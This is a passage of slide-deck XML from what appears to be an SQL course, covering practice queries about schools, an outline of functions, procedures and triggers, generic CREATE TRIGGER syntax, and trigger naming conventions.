                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the total number of schools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>which are active.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the schools which has highest number of teacher</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Display the schools which has collected Maximum fees this year from April 1, of this year</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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9" name="Shape 3399"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3400" name="Google Shape;3400;p549"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="20140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020" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MySQL Repair</a:t>
            </a:r>
            <a:endParaRPr sz="5020"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3405" name="Google Shape;3405;p550"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="9784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520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advanced SQL Topics</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3406" name="Google Shape;3406;p550"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3090049" y="1793716"/>
            <a:ext cx="3416700" cy="2373000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-441325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3350"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3350">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Functions</a:t>
            </a:r>
            <a:endParaRPr sz="3350">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-441325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3350"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3350">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Procedures</a:t>
            </a:r>
            <a:endParaRPr sz="3350">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-441325" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3350"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3350">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Triggers</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3407" name="Google Shape;3407;p550"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205625" y="248925"/>
            <a:ext cx="1708550" cy="487025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3412" name="Google Shape;3412;p551"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159300" y="385800"/>
            <a:ext cx="8520600" cy="5727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1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3815">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Triggers Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3413" name="Google Shape;3413;p551"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="943950" y="1300300"/>
            <a:ext cx="7256100" cy="3622500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="25400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="156250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>TRIGGER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> trigger_name  trigger_time trigger_event  </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="25400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="156250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> table_name </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>FOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> EACH ROW  </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="25400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="156250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>BEGIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="25400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="156250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>    	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Statements 1;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="008200"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="25400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="156250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Statements 2;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="008200"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="25400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="156250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>….</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="008200"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="25400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="156250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="006699"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>END</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>;  </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="0077AA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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7" name="Shape 3417"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3418" name="Google Shape;3418;p552"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159300" y="274400"/>
            <a:ext cx="8520600" cy="5727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1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3815">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Trigger Name Conventions</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3419" name="Google Shape;3419;p552"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293100" y="847100"/>
            <a:ext cx="8724900" cy="3945900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Prefixes:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Use a prefix to indicate the type of the trigger. For example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>trg_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> for triggers.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Table Name:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Include the table name as part of the trigger name. This helps to identify which table the trigger is associated with. Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>trg_table_name</a:t>
            </a:r>
            <a:endParaRPr sz="950">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Action/Event:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Include a brief indication of the trigger action or event. For instance:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
